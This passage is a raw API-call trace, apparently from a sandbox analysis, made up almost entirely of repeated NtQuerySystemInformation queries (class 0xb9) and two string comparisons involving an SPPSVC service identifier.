NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.209] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.237] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.259] NtQuerySystemInformation 